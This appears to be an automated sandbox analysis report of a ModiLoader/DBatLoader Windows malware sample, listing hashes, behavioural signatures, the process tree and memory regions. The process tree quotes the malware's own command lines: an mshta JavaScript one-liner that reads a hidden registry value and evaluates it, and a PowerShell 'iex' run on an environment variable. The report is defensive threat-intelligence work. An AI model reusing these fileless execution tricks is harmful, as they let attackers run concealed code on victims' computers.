Analysis

  • max time kernel
    100s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-11-2022 06:07

General

  • Target

    ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exe

  • Size

    352KB

  • MD5

    7a60ce64e7fd84d41e2852c0b26f8694

  • SHA1

    b7099c4e097d060f296748bc14ef93d9b4243fa0

  • SHA256

    ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc

  • SHA512

    df9561e92aedcf1812118cb3a50ab3b039315189ca39a059a1d3593b18dbba2626b9da3b10ac99ad6d6f547d9062fa66218799fb770a3d9c8dab8a88478e913d

  • SSDEEP

    3072:CPkV3CEwdOR51PCjVmDIjnUCL/PR76xUUA51RRpaZntcVjy/DU6W4ij0UiJd9QTw:CN1oZn+VGrU68xe9QTl+t1gZn9vMikbf

Score
10/10

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ModiLoader Second Stage 6 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exe
    "C:\Users\Admin\AppData\Local\Temp\ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2992
    • C:\Users\Admin\AppData\Local\Temp\ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exe
      "C:\Users\Admin\AppData\Local\Temp\ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exe"
      2⤵
        PID:1204
    • C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" javascript:M1mdexh="x";v1m=new%20ActiveXObject("WScript.Shell");kjoA2X="I2qrEy";ud8yn8=v1m.RegRead("HKLM\\software\\Wow6432Node\\nxsDvx\\mWDqhgl");xv1iIFH="7yK1d";eval(ud8yn8);s8bbeT1="4Ku";
      1⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4304
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:kydpfvc
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:212

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/212-145-0x0000000005690000-0x00000000056B2000-memory.dmp

      Filesize

      136KB

    • memory/212-150-0x0000000006930000-0x000000000694A000-memory.dmp

      Filesize

      104KB

    • memory/212-149-0x0000000007B70000-0x00000000081EA000-memory.dmp

      Filesize

      6.5MB

    • memory/212-148-0x00000000063E0000-0x00000000063FE000-memory.dmp

      Filesize

      120KB

    • memory/212-147-0x0000000005EF0000-0x0000000005F56000-memory.dmp

      Filesize

      408KB

    • memory/212-141-0x0000000000000000-mapping.dmp

    • memory/212-146-0x0000000005E80000-0x0000000005EE6000-memory.dmp

      Filesize

      408KB

    • memory/212-143-0x00000000050B0000-0x00000000050E6000-memory.dmp

      Filesize

      216KB

    • memory/212-144-0x0000000005720000-0x0000000005D48000-memory.dmp

      Filesize

      6.2MB

    • memory/1204-138-0x0000000000400000-0x000000000043A000-memory.dmp

      Filesize

      232KB

    • memory/1204-142-0x00000000009C0000-0x0000000000A96000-memory.dmp

      Filesize

      856KB

    • memory/1204-139-0x00000000009C0000-0x0000000000A96000-memory.dmp

      Filesize

      856KB

    • memory/1204-134-0x0000000000000000-mapping.dmp

    • memory/1204-137-0x0000000000400000-0x000000000043A000-memory.dmp

      Filesize

      232KB

    • memory/1204-135-0x0000000000400000-0x000000000043A000-memory.dmp

      Filesize

      232KB